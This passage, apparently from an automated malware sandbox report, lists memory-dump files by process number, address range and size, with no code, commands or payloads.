                                                                                                                                • memory/4656-341-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4656-519-0x0000000000400000-0x0000000002BB8000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  39.7MB

                                                                                                                                • memory/4656-503-0x0000000004870000-0x0000000004946000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  856KB

                                                                                                                                • memory/4772-347-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4796-348-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4796-358-0x000000001B480000-0x000000001B482000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/4864-540-0x0000000004E10000-0x0000000004E11000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4960-355-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4960-376-0x000000001B6C0000-0x000000001B6C2000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/5124-587-0x000002812AD40000-0x000002812ADB2000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  456KB

                                                                                                                                • memory/5340-604-0x0000000005F70000-0x0000000005F71000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5340-565-0x0000000077580000-0x000000007770E000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.6MB

                                                                                                                                • memory/5552-614-0x00000000063B0000-0x00000000063B1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5552-555-0x0000000077580000-0x000000007770E000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.6MB

                                                                                                                                • memory/5660-599-0x0000000004E90000-0x0000000004EED000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  372KB

                                                                                                                                • memory/5660-573-0x0000000004F41000-0x0000000005042000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.0MB

                                                                                                                                • memory/5668-581-0x00000000026F0000-0x00000000026F1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5692-619-0x0000000005820000-0x0000000005821000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB